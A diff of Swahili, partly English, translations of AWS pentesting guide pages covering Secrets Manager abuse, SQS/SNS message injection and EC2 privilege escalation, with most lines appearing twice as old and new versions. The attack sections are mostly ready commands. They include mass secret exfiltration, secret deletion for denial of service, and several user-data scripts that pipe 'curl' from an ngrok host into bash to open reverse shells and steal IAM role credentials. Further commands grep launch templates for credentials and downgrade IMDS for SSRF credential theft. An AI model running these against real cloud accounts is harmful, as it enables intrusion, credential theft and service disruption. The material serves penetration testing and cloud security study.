Baada ya kubadilisha key ya secret, mshambuliaji anabadilisha usanidi wa key yao ili wao pekee waweze kuiingiza. Kwa njia hii, katika matoleo yafuatayo ya secret, itakuwa imesimbwa kwa key mpya, na kwa kuwa hakuna upatikanaji wa key hiyo, uwezo wa kupata secret utapotea.
Ni muhimu kutambua kuwa ukosefu huu wa upatikanaji utatokea tu katika matoleo ya baadaye, baada ya yaliyomo kwenye siri kubadilika, kwa sababu toleo la sasa bado limefichwa kwa KMS key ya awali.
Ni muhimu kutambua kwamba ukosefu huu wa upatikanaji utatokea tu katika matoleo ya baadaye, baada ya yaliyomo kwenye secret kubadilika, kwa sababu toleo la sasa bado limesimbwa kwa KMS key ya awali.
```bash
aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
```
### DoS Deleting Secret
### DoS Kufuta Secret
Idadi ya chini ya siku za kufuta secret ni 7
```bash
@@ -48,16 +48,16 @@ aws secretsmanager delete-secret \
```
## secretsmanager:RestoreSecret
Inawezekana kurejesha secret, jambo linalowezesha urejeshaji wa secrets zilizopangwa kufutwa, kwa kuwa kipindi kidogo cha kufuta secrets ni siku 7 na cha juu ni siku 30. Pamoja na ruhusa secretsmanager:GetSecretValue, hili linafanya iwezekane kupata maudhui yao.
Ni inawezekana kurejesha secret, jambo linaloruhusu kurejesha secrets ambazo zimepangwa kufutwa, kwa kuwa kipindi cha chini cha kufuta secrets ni siku 7 na cha juu ni siku 30. Pamoja na ruhusa secretsmanager:GetSecretValue, hili linawezesha kupata yaliyomo yao.
Ili kurejesha secret ambayo iko katika mchakato wa kufutwa, unaweza kutumia amri ifuatayo:
Ili kurejesha secret ambayo iko mchakato wa kufutwa, unaweza kutumia amri ifuatayo:
```bash
aws secretsmanager restore-secret \
--secret-id <Secret_Name>
```
## secretsmanager:DeleteResourcePolicy
Kitendo hiki kinaruhusu kufuta resource policy inayodhibiti nani anaweza kufikia secret. Hii inaweza kusababisha DoS ikiwa resource policy ilikuwa imewekwa kuruhusu upatikanaji kwa kundi maalum la watumiaji.
Kitendo hiki kinaruhusu kufuta resource policy inayodhibiti nani anaweza kupata secret. Hii inaweza kusababisha DoS ikiwa resource policy ilipangwa kuruhusu kupata kwa kundi maalum la watumiaji.
Ili kufuta resource policy:
```bash
@@ -66,11 +66,11 @@ aws secretsmanager delete-resource-policy \
```
## secretsmanager:UpdateSecretVersionStage
Hali za siri hutumika kusimamia matoleo ya siri. AWSCURRENT inaonyesha toleo la sasa ambalo programu zinazitumia, AWSPREVIOUS huhifadhi toleo lililopita ili uweze kurudi nyuma ikiwa ni lazima, na AWSPENDING hutumika katika mchakato wa mzunguko kuandaa na kuthibitisha toleo jipya kabla ya kulifanya kuwa toleo la sasa.
Hali za siri zinatumika kusimamia matoleo ya siri. AWSCURRENT inaashiria toleo la aktifu ambalo applications zinatumia, AWSPREVIOUS huhifadhi toleo la awali ili uweze kurudi nyuma ikiwa ni lazima, na AWSPENDING inatumiwa katika mchakato wa mzunguko kuandaa na kuthibitisha toleo jipya kabla ya kulitangaza kuwa toleo la sasa.
Programu daima husoma toleo lenye AWSCURRENT. Ikiwa mtu atahamisha lebo hiyo kwa toleo lisilo sahihi, programu zitatumia vitambulisho batili na zinaweza kushindwa.
Applications kila wakati husoma toleo lenye lebo AWSCURRENT. Ikiwa mtu atahamisha lebo hiyo kwa toleo lisilo sahihi, apps zitatumia sifa za kuingia zisizo sahihi na zinaweza kushindwa.
AWSPREVIOUS haitumiki kiotomatiki. Hata hivyo, ikiwa AWSCURRENT itaondolewa au itapangiwa upya kwa njia isiyo sahihi, inaweza kuonekana kwamba kila kitu bado kinaendelea kwa toleo lililopita.
AWSPREVIOUS haitumiki moja kwa moja. Hata hivyo, ikiwa AWSCURRENT itaondolewa au kutolewa tena kwa njia isiyo sahihi, inaweza kuonekana kwamba kila kitu bado kinaendelea kwa toleo la awali.
```bash
aws secretsmanager update-secret-version-stage \
--secret-id <your-secret-name-or-arn> \
@@ -78,32 +78,26 @@ aws secretsmanager update-secret-version-stage \
--move-to-version-id <target-version-id> \
--remove-from-version-id <previous-version-id>
```
{{#include ../../../../banners/hacktricks-training.md}}
### Mass Secret Exfiltration via BatchGetSecretValue (hadi 20 kwa kila mwito)
Dhulumu API ya Secrets Manager BatchGetSecretValue ili kupata hadi 20 secrets katika ombi moja. Hii inaweza kupunguza kwa kiasi kikubwa idadi ya wito za API ikilinganishwa na kurudia GetSecretValue kwa kila secret. Ikiwa filters zinatumika (tags/name), ruhusa ya ListSecrets pia inahitajika. CloudTrail bado inarekodi tukio moja la GetSecretValue kwa kila secret inayopatikana katika batch.
### Mass Secret Exfiltration via BatchGetSecretValue (up to 20 per call)
Tumia vibaya Secrets Manager BatchGetSecretValue API ili kupata hadi 20 secrets kwa ombi moja. Hii inaweza kupunguza kwa kiasi kikubwa idadi ya API-call ikilinganishwa na kurudia GetSecretValue kwa kila secret. Ikiwa vichujio (tags/name) vinatumika, ruhusa ya ListSecrets pia inahitajika. CloudTrail bado inarekodi tukio moja la GetSecretValue kwa kila secret iliyopewa kwenye batch.
Required permissions
Ruhusa zinazohitajika
- secretsmanager:BatchGetSecretValue
- secretsmanager:GetSecretValue for each target secret
- secretsmanager:ListSecrets if using --filters
- kms:Decrypt on the CMKs used by the secrets (if not using aws/secretsmanager)
- secretsmanager:GetSecretValue kwa kila secret inayolengwa
- secretsmanager:ListSecrets endapo unatumia --filters
- kms:Decrypt kwenye CMKs zinazotumika na secrets (ikiwa haujatumia aws/secretsmanager)
> [!WARNING]
> Kumbuka kwamba ruhusa `secretsmanager:BatchGetSecretValue` peke yake haitoshi kupata secrets; pia unahitaji `secretsmanager:GetSecretValue` kwa kila secret unayotaka kupata.
> Kumbuka kwamba ruhusa `secretsmanager:BatchGetSecretValue` haitoshi kupata secrets; pia unahitaji `secretsmanager:GetSecretValue` kwa kila secret unayotaka kupata.
Exfiltrate by explicit list
Exfiltrate kwa orodha wazi
```bash
aws secretsmanager batch-get-secret-value \
--secret-id-list <secret1> <secret2> <secret3> \
--query 'SecretValues[].{Name:Name,Version:VersionId,Val:SecretString}'
```
Exfiltrate kwa kutumia filters (tag key/value au name prefix)
Exfiltrate kwa kutumia vichujio (tag key/value au name prefix)
```bash
# By tag key
aws secretsmanager batch-get-secret-value \
@@ -126,5 +120,6 @@ Kushughulikia kushindwa kwa sehemu
aws secretsmanager batch-get-secret-value --secret-id-list <id1> <id2> <id3>
```
Athari
- Haraka “smash-and-grab” ya siri nyingi kwa maombi machache ya API, ambayo inaweza kuiepuka mfumo wa onyo uliolenga mionekano ya ghafla ya GetSecretValue.
- Rejista za CloudTrail bado zinajumuisha tukio moja la GetSecretValue kwa kila siri iliyopatikana katika kundi.
- Haraka “smash-and-grab” ya secrets nyingi kwa kutumia API calls chache, ambayo inaweza kupitisha alerting iliyolengwa kwa kuongezeka kwa GetSecretValue.
- CloudTrail logs bado zinajumuisha tukio moja la GetSecretValue kwa kila secret iliyopatikana na batch.
{{#include ../../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-sns-injection.md
View File

@@ -4,14 +4,14 @@
## Maelezo
Tumia vibaya sera ya rasilimali ya SQS queue ili kumruhusu topic ya SNS inayodhibitiwa na mshambuliaji kuchapisha ujumbe ndani ya SQS queue ya mwathiriwa. Katika akaunti ile ile, subscription ya SQS kwa topic ya SNS inathibitishwa kwa njia ya moja kwa moja; katika cross-account, lazima usome token ya SubscriptionConfirmation kutoka kwenye queue na uite ConfirmSubscription. Hii inaiwezesha unsolicited message injection ambayo watumiaji wa downstream wanaweza kuitegemea bila kutambua.
Tumia vibaya sera ya rasilimali ya SQS queue ili kumruhusu topic ya SNS inayodhibitiwa na mshambulizi kuchapisha ujumbe ndani ya SQS queue ya waathiriwa. Katika akaunti ile ile, subscription ya SQS kwa topic ya SNS inathibitishwa kiotomatiki; kwa cross-account, lazima usome token ya SubscriptionConfirmation kutoka kwenye queue na uitumie ConfirmSubscription. Hii inawawezesha injection ya ujumbe isiyo imara ambayo matumiaji wa mwisho wanaweza kuitegemea bila kujua.
### Mahitaji
- Uwezo wa kubadilisha sera ya rasilimali ya SQS queue lengwa: `sqs:SetQueueAttributes` kwenye queue ya mwathiriwa.
- Uwezo wa kuunda/kuchapisha kwenye topic ya SNS inayodhibitiwa na mshambuliaji: `sns:CreateTopic`, `sns:Publish`, na `sns:Subscribe` kwenye akaunti/topic ya mshambuliaji.
- Kwa cross-account pekee: `sqs:ReceiveMessage` ya muda kwenye queue ya mwathiriwa ili kusoma token ya uthibitisho na kuita `sns:ConfirmSubscription`.
- Uwezo wa kubadilisha sera ya rasilimali ya SQS queue lengwa: `sqs:SetQueueAttributes` kwenye queue ya waathiriwa.
- Uwezo wa kuunda/kuchapisha kwenye topic ya SNS inayodhibitiwa na mshambulizi: `sns:CreateTopic`, `sns:Publish`, na `sns:Subscribe` kwenye akaunti/topic ya mshambulizi.
- Kwa cross-account pekee: kwa muda `sqs:ReceiveMessage` kwenye queue ya waathiriwa ili kusoma token ya uthibitisho na uitumie `sns:ConfirmSubscription`.
### Ushambulizi wa akaunti ile ile
### Utekelezaji katika akaunti ile ile
```bash
REGION=us-east-1
# 1) Create victim queue and capture URL/ARN
@@ -44,11 +44,11 @@ aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoin
aws sns publish --topic-arn "$TOPIC_ARN" --message {pwn:sns->sqs} --region $REGION
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All
```
### Vidokezo vya akaunti tofauti
- Sera ya foleni iliyotajwa juu lazima iruhusu `TOPIC_ARN` ya kigeni (akaunti ya mshambuliaji).
- Usajili hautathibitishwa kiotomatiki. Jipe ruhusa ya muda `sqs:ReceiveMessage` kwenye foleni ya mwathirika ili kusoma ujumbe wa `SubscriptionConfirmation` kisha itumie `sns confirm-subscription` ukitumia `Token` yake.
### Vidokezo kati ya akaunti
- Sera ya queue iliyotajwa hapo juu lazima iruhusu `TOPIC_ARN` wa kigeni (akaunti ya mshambuliaji).
- Subscriptions hazitathibitishwa kiotomatiki. Jipe ruhusa ya muda ya `sqs:ReceiveMessage` kwenye queue ya mwathiriwa ili usome ujumbe wa `SubscriptionConfirmation` na kisha piga `sns confirm-subscription` ukiwa na `Token` wake.
### Athari
**Athari Inayoweza Kutokea**: Kuingiza ujumbe usiotakiwa kwa kuendelea ndani ya foleni ya SQS inayotegemewa kupitia SNS, ambayo inaweza kuamsha usindikaji usiolengwa, uchafuzi wa data, au matumizi mabaya ya mtiririko wa kazi.
**Athari Inayowezekana**: Kuingizwa kwa ujumbe usiohitajika kwa mfululizo katika queue ya SQS ya kuaminika kupitia SNS, inaweza kusababisha usindikaji usiokusudiwa, uchafuzi wa data, au matumizi mabaya ya workflow.
{{#include ../../../../banners/hacktricks-training.md}}

94
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc/README.md
View File

@@ -4,7 +4,7 @@
## EC2
Kwa **maelezo kuhusu EC2** angalia:
Kwa maelezo zaidi kuhusu **EC2**, angalia:
{{#ref}}
../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,19 +12,19 @@ Kwa **maelezo kuhusu EC2** angalia:
### `iam:PassRole`, `ec2:RunInstances`
Mshambuliaji anaweza **kuunda instance na kuiambatanisha na IAM role kisha kufikia instance** ili kuiba IAM role credentials kutoka kwenye metadata endpoint.
Mshambulizi anaweza **kuunda instance na kuibandika IAM role kisha kuingilia instance hiyo** ili kuiba kredenshiali za IAM role kutoka kwenye metadata endpoint.
- **Ufikiaji kupitia SSH**
Endesha instance mpya ukitumia **imeundwa** **ssh key** (`--key-name`) kisha ingia kwa ssh ndani yake (kama unataka kuunda mpya, unaweza kuhitaji kuwa na ruhusa `ec2:CreateKeyPair`).
Kendesha instance mpya ukitumia **iliyoundwa** **ssh key** (`--key-name`) kisha uingie kwa ssh ndani yake (ikiwa unataka kuunda mpya unaweza kuhitaji ruhusa `ec2:CreateKeyPair`).
```bash
aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
--security-group-ids <sg-id>
```
- **Upatikanaji kupitia rev shell katika user data**
- **Ufikiaji kupitia rev shell katika user data**
Unaweza kuendesha instance mpya ukitumia **user data** (`--user-data`) ambayo itakutumia **rev shell**. Hauhitaji kubainisha security group kwa njia hii.
Unaweza kuendesha instance mpya ukitumia **user data** (`--user-data`) itakayokutumia **rev shell**. Hutahitaji kutaja security group kwa njia hii.
```bash
echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
@@ -34,17 +34,17 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--count 1 \
--user-data "file:///tmp/rev.sh"
```
Kuwa mwangalifu na GuradDuty ikiwa unatumia vigezo vya IAM role nje ya instance:
Kuwa mwangalifu na GuradDuty ikiwa utatumia credentials za IAM role nje ya instance:
{{#ref}}
../../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
{{#endref}}
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa EC2 role yoyote iliyounganishwa na instance profiles zilizopo.
**Athari Inayoweza Kutokea:** Direct privesc kwa EC2 role yoyote iliyounganishwa na instance profiles zilizopo.
#### Privesc kwa ECS
Kwa seti hii ya ruhusa unaweza pia **kuunda EC2 instance na kuisajili ndani ya ECS cluster**. Kwa njia hii, ECS **huduma** zita **endeshwa** ndani ya **EC2 instance** unayoweza kufikia na kisha unaweza kuingia ndani ya huduma hizo (docker containers) na **steal their ECS roles attached**.
Kwa seti hii ya ruhusa unaweza pia **kuunda EC2 instance na kuiandikisha ndani ya ECS cluster**. Kwa njia hii, ECS **services** zita**endeshwa** ndani ya **EC2 instance** ambayo una upatikanaji kwake, na kisha unaweza kuingilia huduma hizo (docker containers) na **kuiba ECS roles zao zilizounganishwa**.
```bash
aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
@@ -59,20 +59,20 @@ aws ec2 run-instances \
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
```
Ili kujifunza jinsi ya **kulazimisha ECS services ziendeshwe** kwenye EC2 instance hii mpya angalia:
To learn how to **force ECS services to be run** in this new EC2 instance check:
{{#ref}}
../aws-ecs-privesc/README.md
{{#endref}}
Ikiwa **huwezi kuunda instance mpya** lakini una ruhusa `ecs:RegisterContainerInstance`, huenda ukaweza kusajili instance ndani ya cluster na kufanya shambulio lililotajwa.
If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack.
**Potential Impact:** Privesc ya moja kwa moja kwa ECS roles zinazounganishwa na tasks.
**Potential Impact:** privesc ya moja kwa moja kwa ECS roles zilizounganishwa na tasks.
### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
Sawa na tukio lililopita, mshambuliaji mwenye ruhusa hizi anaweza **kubadilisha IAM role ya instance iliyodhuriwa** ili aweze kuiba credentials mpya.
Kwa kuwa instance profile inaweza kuwa na role 1 tu, ikiwa instance profile **tayari ina role** (hali ya kawaida), pia utahitaji **`iam:RemoveRoleFromInstanceProfile`**.
Kama katika senario iliyotangulia, mshambuliaji akiwa na ruhusa hizi anaweza **kubadilisha IAM role ya instance iliyobebwa** ili aweze kuiba kredenshali mpya.\
Kwa kuwa instance profile inaweza kuwa na role moja tu, ikiwa instance profile **tayari ina role** (hali ya kawaida), utahitaji pia **`iam:RemoveRoleFromInstanceProfile`**.
```bash
# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>
@@ -80,34 +80,36 @@ aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-
# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
```
Iwapo **instance profile** ina **role** na **attacker** haiwezi kuiondoa, kuna njia mbadala. Anaweza kutafuta **instance profile** bila **role** au kuunda mpya (`iam:CreateInstanceProfile`), kuiongezea **role** ile **instance profile** (kama ilivyotajwa hapo awali), na kuhusisha **instance profile** compromised kwa compromised i**nstance:**
Ikiwa **instance profile ina role** na attacker **hawezi kuiondoa**, kuna suluhisho jingine.
- Ikiwa **instance** haina **instance profile** yoyote (`ec2:AssociateIamInstanceProfile`)
Anaweza **kutafuta** **instance profile bila role** au **kuunda mpya** (`iam:CreateInstanceProfile`), **kuongeza** **role** kwa **instance profile** hiyo (kama ilivyojadiliwa hapo awali), na **kuhusisha instance profile** iliyovamiwa kwa i**nstance:** iliyovamiwa:
- Ikiwa instance **haina instance yoyote** profile (`ec2:AssociateIamInstanceProfile`)
```bash
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
```
**Athari Inayoweza Kutokea:** Direct privesc to a different EC2 role (inahitaji kuwa umepata udhibiti wa AWS EC2 instance na kuwa na ruhusa za ziada au hali maalum ya instance profile).
**Athari Inayowezekana:** Direct privesc kwa role tofauti ya EC2 (unahitaji kuwa umetekwa AWS EC2 instance na ruhusa za ziada au hali maalum ya instance profile).
### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
Kwa ruhusa hizi inawezekana kubadilisha instance profile iliyohusishwa na instance, kwa hivyo ikiwa mshambulizi tayari alikuwa na ufikiaji wa instance, atakuwa na uwezo wa kuiba credentials za roles zaidi za instance profile kwa kubadilisha ile iliyohusishwa nayo.
Kwa ruhusa hizi inawezekana kubadilisha instance profile inayohusishwa na instance, hivyo ikiwa mshambuliaji tayari alikuwa na ufikiaji wa instance atakuwa na uwezo wa kuiba credentials za role zaidi za instance profile kwa kubadilisha ile inayohusishwa nayo.
- Ikiwa **ina instance profile**, unaweza **kuiondoa** instance profile (`ec2:DisassociateIamInstanceProfile`) na **kuihusisha** it
- Ikiwa **ina instance profile**, unaweza **kuondoa** instance profile (`ec2:DisassociateIamInstanceProfile`) na **kuihusisha** it
```bash
aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
```
- au **badili** **instance profile** ya instance iliyotekwa (`ec2:ReplaceIamInstanceProfileAssociation`).
- au **badilisha** **instance profile** ya instance iliyotekwa (`ec2:ReplaceIamInstanceProfileAssociation`).
```bash
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
```
**Athari Inayowezekana:** Direct privesc kwa EC2 role tofauti (unahitaji kuwa compromised AWS EC2 instance na ruhusa za ziada au specific instance profile status).
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa EC2 role tofauti (unahitaji kuwa umeshapata udhibiti wa instance ya AWS EC2 na ruhusa za ziada au hali maalum ya instance profile).
### `ec2:RequestSpotInstances`,`iam:PassRole`
Mshambulizi mwenye ruhusa **`ec2:RequestSpotInstances`and`iam:PassRole`** anaweza **kuomba** **Spot Instance** yenye **EC2 Role imeambatishwa** na **rev shell** katika **user data**.\
Mara instance ikianzishwa, anaweza **kuiba IAM role**.
Mshambuliaji mwenye ruhusa **`ec2:RequestSpotInstances`and`iam:PassRole`** anaweza **kuomba** **Spot Instance** yenye **EC2 Role attached** na **rev shell** katika **user data**.\
Mara instance itakapokimbia, anaweza **kuiba the IAM role**.
```bash
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
@@ -119,9 +121,9 @@ aws ec2 request-spot-instances \
```
### `ec2:ModifyInstanceAttribute`
Mshambuliaji mwenye **`ec2:ModifyInstanceAttribute`** anaweza kubadilisha sifa za instances. Miongoni mwa hizo, anaweza **change the user data**, ambayo inamaanisha anaweza kufanya instance i**run arbitrary data.** Hii inaweza kutumika kupata **rev shell to the EC2 instance**.
Mshambuliaji mwenye **`ec2:ModifyInstanceAttribute`** anaweza kubadilisha sifa za instance. Miongoni mwa hizo, anaweza **kubadilisha user data**, jambo linalomaanisha anaweza kufanya instance **itekeleze data yoyote.** Hii inaweza kutumika kupata **rev shell kwa EC2 instance**.
Kumbuka kwamba sifa zinaweza tu **kubadilishwa wakati instance imezimwa**, kwa hivyo inahitaji ruhusa za **`ec2:StopInstances`** na **`ec2:StartInstances`**.
Kumbuka kwamba sifa zinaweza tu **kubadilishwa wakati instance imezimwa**, kwa hivyo inahitaji **ruhusa** **`ec2:StopInstances`** na **`ec2:StartInstances`**.
```bash
TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
@@ -158,11 +160,11 @@ aws ec2 modify-instance-attribute \
aws ec2 start-instances --instance-ids $INSTANCE_ID
```
**Athari Inayowezekana:** privesc ya moja kwa moja kwa EC2 IAM Role yoyote iliyounganishwa na instance iliyoundwa.
**Athari Inayoweza Kutokea:** Direct privesc kwa EC2 IAM Role yoyote iliyounganishwa na instance iliyotengenezwa.
### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate`
Mshambuliaji mwenye ruhusa **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** anaweza kuunda **version mpya ya Launch Template** yenye **rev shell ndani ya** **user data** na **EC2 IAM Role yoyote juu yake**, kubadilisha default version, na **Autoscaler group yoyote** **linalotumia** **Launch Templat**e ambayo ime **configured** kutumia **latest** au **default version** ita **re-run the instances** kwa kutumia template hiyo na itatekeleza rev shell.
Mshambuliaji mwenye ruhusa **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate` na `ec2:ModifyLaunchTemplate`** anaweza kuunda **toleo jipya la Launch Template** lenye **rev shell katika** **user data** na **EC2 IAM Role yoyote juu yake**, kubadilisha **default version**, na **kundi yoyote la Autoscaler** **linalotumia** huo **Launch Template** ambalo **limepangwa** kutumia **latest** au **default version** litarudia kuendesha tena **instances** kwa kutumia template hiyo na itaendesha rev shell.
```bash
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
@@ -176,11 +178,11 @@ aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2
```
**Potential Impact:** Privesc ya moja kwa moja kwa EC2 role tofauti.
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa EC2 role tofauti.
### (`autoscaling:CreateLaunchConfiguration` | `ec2:CreateLaunchTemplate`), `iam:PassRole`, (`autoscaling:CreateAutoScalingGroup` | `autoscaling:UpdateAutoScalingGroup`)
Mshambuliaji mwenye ruhusa **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** anaweza **kuunda Launch Configuration** yenye **IAM Role** na **rev shell** ndani ya **user data**, kisha **kuunda autoscaling group** kutoka kwa config hiyo na kusubiri rev shell **kuiba IAM Role**.
Mshambuliaji mwenye ruhusa **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** anaweza **create a Launch Configuration** yenye **IAM Role** na **rev shell** ndani ya **user data**, kisha **create an autoscaling group** kutoka kwa config hiyo na kusubiri rev shell ili **steal the IAM Role**.
```bash
aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
--launch-configuration-name bad_config \
@@ -196,28 +198,28 @@ aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
--desired-capacity 1 \
--vpc-zone-identifier "subnet-e282f9b8"
```
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa role tofauti ya EC2.
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa role tofauti ya EC2.
### `!autoscaling`
Kikundi cha ruhusa **`ec2:CreateLaunchTemplate`** na **`autoscaling:CreateAutoScalingGroup`** **hakitoshi kufanya privesc** kwenda kwa IAM role kwa sababu ili kuambatisha role iliyotajwa katika Launch Configuration au katika Launch Template **unahitaji ruhusa `iam:PassRole` na `ec2:RunInstances`** (hii ni privesc inayojulikana).
Seti ya ruhusa **`ec2:CreateLaunchTemplate`** na **`autoscaling:CreateAutoScalingGroup`** hazitoshi ku-escalate privileges hadi kwa role ya IAM kwa sababu ili kufunga role iliyotajwa katika Launch Configuration au Launch Template unahitaji ruhusa **`iam:PassRole`** na **`ec2:RunInstances`** (ambayo ni privesc inayojulikana).
### `ec2-instance-connect:SendSSHPublicKey`
Mshambuliaji mwenye ruhusa **`ec2-instance-connect:SendSSHPublicKey`** anaweza kuongeza ssh key kwa mtumiaji na kuitumia kuingia (ikiwa ana ufikiaji wa ssh kwenye instance) au kuinua vibali.
Mshambuliaji mwenye ruhusa **`ec2-instance-connect:SendSSHPublicKey`** anaweza kuongeza ufunguo wa ssh kwa mtumiaji na kuutumia kuingia (ikiwa ana ufikiaji wa ssh kwenye instance) au kupata privesc.
```bash
aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "ec2-user" \
--ssh-public-key "file://$PUBK_PATH"
```
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizounganishwa na running instances.
**Madhara Yanayoweza Kutokea:** Direct privesc kwa EC2 IAM roles zilizoambatanishwa na instances zinazoendesha.
### `ec2-instance-connect:SendSerialConsoleSSHPublicKey`
Mshambuliaji aliye na idhini **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** anaweza **kuongeza ssh key kwenye muunganisho wa serial**. Ikiwa serial haijawezeshwa, mshambuliaji anahitaji idhini **`ec2:EnableSerialConsoleAccess` ili kuiwezesha**.
Mshambuliaji mwenye ruhusa **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** anaweza **kuongeza ssh key kwa muunganisho wa serial**. Ikiwa serial haijawezeshwa, mshambuliaji anahitaji ruhusa **`ec2:EnableSerialConsoleAccess` ili kuiwezesha**.
Ili kuunganishwa kwenye serial port pia **unahitaji kujua username na password ya mtumiaji** ndani ya mashine.
Ili kuunganishwa na port ya serial pia **unahitaji kujua jina la mtumiaji na nywila ya mtumiaji** ndani ya mashine.
```bash
aws ec2 enable-serial-console-access
@@ -229,13 +231,13 @@ aws ec2-instance-connect send-serial-console-ssh-public-key \
ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
```
Njia hii si ya msaada mkubwa kwa privesc kwa sababu unahitaji kujua jina la mtumiaji na nenosiri ili kuitekeleza.
Njia hii si ya muhimu sana kwa privesc kwa kuwa unahitaji kujua username na password ili kui exploit.
**Athari Inayowezekana:** (Haiwezi kuthibitishwa kwa urahisi) privesc ya moja kwa moja kwa EC2 IAM roles zilizohusishwa na running instances.
**Potential Impact:** (Hawezi kuthibitishwa kwa urahisi) Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatishwa kwa instances zinazotumika.
### `describe-launch-templates`,`describe-launch-template-versions`
Kwa kuwa launch templates zina matoleo, mshambuliaji mwenye ruhusa za **`ec2:describe-launch-templates`** na **`ec2:describe-launch-template-versions`** anaweza kuzitumia kugundua taarifa nyeti, kama sifa za kuingia zilizomo katika user data. Ili kufanya hivyo, script ifuatayo inaruka kupitia matoleo yote ya launch templates zilizopo:
Kwa kuwa launch templates zina versioning, mshambuliaji akiwa na ruhusa za **`ec2:describe-launch-templates`** na **`ec2:describe-launch-template-versions`** anaweza kuzitumia ili kugundua taarifa nyeti, kama vile credentials zilizopo katika user data. Ili kufanikisha hili, script ifuatayo inazunguka kupitia matoleo yote ya launch templates zilizopo:
```bash
for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
do
@@ -250,25 +252,20 @@ done
```
Katika amri zilizo hapo juu, ingawa tunabainisha mifumo fulani (`aws_|password|token|api`), unaweza kutumia regex tofauti kutafuta aina nyingine za taarifa nyeti.
Tukichukua kama tunapata `aws_access_key_id` na `aws_secret_access_key`, tunaweza kutumia cheti hizi kuthibitisha utambulisho kwa AWS.
Kama tukigundua `aws_access_key_id` na `aws_secret_access_key`, tunaweza kutumia cheti hizi kuthibitisha utambulisho kwenye AWS.
**Athari Inayoweza Kutokea:** Kuongezeka kwa moja kwa moja kwa idhini kwa mtumiaji(wa) wa IAM.
**Athari Inayowezekana:** Direct privilege escalation to IAM user(s).
## Marejeo
- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
{{#include ../../../../banners/hacktricks-training.md}}
### `ec2:ModifyInstanceMetadataOptions` (IMDS downgrade to enable SSRF credential theft)
Mshambuliaji mwenye uwezo wa kuitisha `ec2:ModifyInstanceMetadataOptions` kwenye instance ya EC2 ya mwathiriwa anaweza kudhoofisha ulinzi wa IMDS kwa kuwezesha IMDSv1 (`HttpTokens=optional`) na kuongeza `HttpPutResponseHopLimit`. Hii inafanya endpoint ya metadata ya instance ipatikane kupitia njia za kawaida za SSRF/proxy kutoka kwa programu zinazoendeshwa kwenye instance. Ikiwa mshambuliaji anaweza kusababisha SSRF katika app kama hiyo, wanaweza kupata credentials za instance profile na pivot nazo.
